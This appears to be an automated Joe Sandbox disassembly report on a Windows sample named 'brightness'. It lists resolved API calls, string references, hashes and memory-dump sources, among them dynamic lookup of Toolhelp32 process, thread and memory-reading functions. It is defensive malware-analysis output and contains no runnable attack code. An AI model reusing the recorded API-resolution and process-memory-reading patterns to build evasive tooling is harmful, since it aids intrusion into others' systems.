                                                                                                                                            • Opcode ID: 2cc67f8cbef03cbb814f4752439739bdd64256798e05cbc2089d9704fb5a7b0e
                                                                                                                                            • Instruction ID: e56b5c5b6e5367d1e571c0479d99e1106df26b898ff6c0373d43e20453bcaf8a
                                                                                                                                            • Opcode Fuzzy Hash: 2cc67f8cbef03cbb814f4752439739bdd64256798e05cbc2089d9704fb5a7b0e
                                                                                                                                            • Instruction Fuzzy Hash: 50E0CD757003016FD7115B7D5D547937BDCEF48654F554475F609DB381D660E8108B60
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,027CABDB,?,?,027CAC6D,00000000,027CAD49), ref: 027CA968
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 027CA980
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 027CA992
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 027CA9A4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 027CA9B6
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 027CA9C8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 027CA9DA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 027CA9EC
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 027CA9FE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 027CAA10
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 027CAA22
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 027CAA34
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 027CAA46
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 027CAA58
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 027CAA6A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 027CAA7C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 027CAA8E
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                            • API String ID: 667068680-597814768
                                                                                                                                            • Opcode ID: edc0102ff3d30ec3c1f36f218b6f325070ac8b6819a847ea622b209d23258a2c
                                                                                                                                            • Instruction ID: bafa3c0f54f42cfd3db23dcf2686a24690a23a6d5c3268466d93486ddf3da33b
                                                                                                                                            • Opcode Fuzzy Hash: edc0102ff3d30ec3c1f36f218b6f325070ac8b6819a847ea622b209d23258a2c
                                                                                                                                            • Instruction Fuzzy Hash: BD31A0F4E807349FEB42DFB4D8E9B963BADEB05705710096DA901CF288D67498508F95
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,027B7330,027B0000,027DE790), ref: 027B58D1
                                                                                                                                            • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 027B58E8
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,?), ref: 027B5918
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,027B7330,027B0000,027DE790), ref: 027B597C
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,027B7330,027B0000,027DE790), ref: 027B59B2
                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,027B7330,027B0000,027DE790), ref: 027B59C5
                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,027B7330,027B0000,027DE790), ref: 027B59D7
                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027B7330,027B0000,027DE790), ref: 027B59E3
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027B7330,027B0000), ref: 027B5A17
                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027B7330), ref: 027B5A23
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 027B5A45
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                            • API String ID: 3245196872-1565342463
                                                                                                                                            • Opcode ID: 4d756634a5b4bd55ebc7403eb9c4a9f93553ee924438ba30deb56eadb9d7bfdb
                                                                                                                                            • Instruction ID: 15d65cb8b53da5f66461d500d231776cbdb27817dcf71e829600d9932debd78e
                                                                                                                                            • Opcode Fuzzy Hash: 4d756634a5b4bd55ebc7403eb9c4a9f93553ee924438ba30deb56eadb9d7bfdb
                                                                                                                                            • Instruction Fuzzy Hash: 74416C72E00259AFDB12DBE8CC88BDEB7BEAF09350F8445A5A548E7241E7709B448F54
                                                                                                                                            APIs
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027B5B94
                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027B5BA1
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027B5BA7
                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027B5BD2
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027B5C19
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027B5C29
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027B5C51
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027B5C61
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027B5C87
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027B5C97
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                            • API String ID: 1599918012-2375825460
                                                                                                                                            • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                            • Instruction ID: b9e58a86988728419bcfdeab2aefddac3eee837e6d715e7ecc035039eb715c39
                                                                                                                                            • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                            • Instruction Fuzzy Hash: B5315471E4021D6AEB27D6B8DC8AFDF77AE5F04380F8445E19608E6181EB749E848F90
                                                                                                                                            APIs
                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 027B7F75
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1705453755-0
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027BA762
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                            APIs
                                                                                                                                            • GetVersionExA.KERNEL32(?,027DD106,00000000,027DD11E), ref: 027BB71A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,027BBDF2,00000000,027BC00B,?,?,00000000,00000000), ref: 027BA7A3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 481472006-0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 027BD21D
                                                                                                                                              • Part of subcall function 027BD1E8: GetProcAddress.KERNEL32(00000000), ref: 027BD201
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(ole32.dll), ref: 027C6E5E
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 027C6E6F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 027C6E7F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 027C6E8F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 027C6E9F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 027C6EAF
                                                                                                                                            • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 027C6EBF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                            • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                            • API String ID: 667068680-2233174745
                                                                                                                                            APIs
                                                                                                                                            • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 027B28CE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message
                                                                                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                            • API String ID: 2030045667-32948583
                                                                                                                                            Strings
                                                                                                                                            • , xrefs: 027B2814
                                                                                                                                            • Unexpected Memory Leak, xrefs: 027B28C0
                                                                                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 027B2849
                                                                                                                                            • An unexpected memory leak has occurred. , xrefs: 027B2690
                                                                                                                                            • The unexpected small block leaks are:, xrefs: 027B2707
                                                                                                                                            • 7, xrefs: 027B26A1
                                                                                                                                            • bytes: , xrefs: 027B275D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                            • API String ID: 0-2723507874
                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,027BC00B,?,?,00000000,00000000), ref: 027BBD76
                                                                                                                                              • Part of subcall function 027BA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027BA762
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                            • API String ID: 4232894706-2493093252
                                                                                                                                            APIs
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 027CAE38
                                                                                                                                            • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 027CAE4F
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 027CAEE3
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000002), ref: 027CAEEF
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 027CAF03
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Read$HandleModule
                                                                                                                                            • String ID: KernelBase$LoadLibraryExA
                                                                                                                                            • API String ID: 2226866862-113032527
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027B43F3,?,?,028117C8,?,?,027DE7A8,027B655D,027DD30D), ref: 027B4365
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027B43F3,?,?,028117C8,?,?,027DE7A8,027B655D,027DD30D), ref: 027B436B
                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,027B43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027B43F3,?,?,028117C8), ref: 027B4380
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,027B43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027B43F3,?,?), ref: 027B4386
                                                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 027B43A4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027BACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 027BACD9
                                                                                                                                              • Part of subcall function 027BACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027BACFD
                                                                                                                                              • Part of subcall function 027BACBC: GetModuleFileNameA.KERNEL32(027B0000,?,00000105), ref: 027BAD18
                                                                                                                                              • Part of subcall function 027BACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027BADAE
                                                                                                                                            • CharToOemA.USER32(?,?), ref: 027BAE7B
                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 027BAE98
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027BAE9E
                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,027BAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027BAEB3
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,027BAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027BAEB9
                                                                                                                                            • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 027BAEDB
                                                                                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 027BAEF1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 185507032-0
                                                                                                                                            APIs
                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027BE5A5
                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027BE5C1
                                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 027BE5FA
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027BE677
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 027BE690
                                                                                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 027BE6C5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                             • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 351091851-0
                                                                                                                                            APIs
